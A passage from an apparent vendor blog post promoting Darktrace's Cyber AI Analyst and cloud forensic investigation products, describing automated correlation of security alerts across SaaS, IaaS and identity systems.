That’s why automation and AI are becoming indispensable. The future of cross-domain investigation lies in systems that can:

  • Automatically correlate activity across domains and data sources, turning disjointed alerts into a single, interpretable incident.
  • Generate and test hypotheses autonomously, identifying likely chains of malicious behaviour without waiting for human triage.
  • Explain findings in human terms, reducing the knowledge gap between junior and senior analysts.
  • Operate within and across hybrid environments, from on-premise networks to SaaS, IaaS, and identity systems.

This is where Darktrace transforms alerting and investigations. Darktrace’s Cyber AI Analyst automates the process of correlation, hypothesis testing, and narrative building, not just within one domain, but across many. An anomalous O365 login, a new S3 bucket, and a suspicious beaconing host are stitched together automatically, surfacing the story behind the alerts rather than leaving it buried in telemetry.

Figure 2: How threat activity is correlated in Cyber AI Analyst

By analyzing events from disparate tools and sources, AI Analyst constructs a unified timeline of activity showing what happened, how it spread, and where to focus next. For analysts, it means investigation time is measured in minutes, not days. For security leaders, it means every member of the SOC, regardless of experience, can contribute meaningfully to a cross-domain response.

Figure 3: Correlation showcasing cross domains (SaaS and IaaS) in Cyber AI Analyst

Until now, forensic investigations were slow, manual, and reserved for only the largest organizations with specialized DFIR expertise. Darktrace / Forensic Acquisition & Investigation changes that by leveraging the scale and elasticity of the cloud itself to automate the entire investigation process. From capturing full disk and memory at detection to reconstructing attacker timelines in minutes, the solution turns fragmented workflows into streamlined investigations available to every team.

What once took days now takes minutes. Now, forensic investigations in the cloud are faster, more scalable, and finally accessible to every security team, no matter their size or expertise.

About the author
Benjamin Druttman
Cyber Security AI Technical Instructor